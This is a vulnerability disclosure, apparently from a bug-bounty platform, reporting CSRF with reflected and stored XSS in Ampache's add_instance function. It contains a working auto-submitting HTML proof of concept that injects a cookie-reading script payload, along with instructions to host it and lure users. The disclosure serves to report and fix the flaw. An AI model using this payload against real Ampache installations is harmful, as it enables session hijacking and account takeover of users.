CSRF, Reflected XSS and Stored XSS in add instance function in ampache/ampache
Valid
Reported on
Jan 15th 2023
Description
The add instance function allows to creation of an instance from user input but does not have any sanitizing mechanism which results in a Reflected XSS bug. This feature can be made by any user in the system, including guest users. After creating the instance will be saved on the system, and when someone executes the add instance function, the payload will be triggered again. This is the stored XSS
Proof of Concept
// exploit.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8888/ampache-5.5.6_all_php7.4/public/localplay.php?action=add_instance" method="POST">
<input type="hidden" name="name" value="test<img/src=x onerror=alert(document.cookie)>" />
<input type="hidden" name="host" value="test" />
<input type="hidden" name="port" value="80" />
<input type="hidden" name="password" value="80" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Save this file on the internet, then send a link containing this file to any user, javascript code will execute an instance will be created.
Impact
Run code javascript in the victim's session which leads to account takeover and performs actions as that user
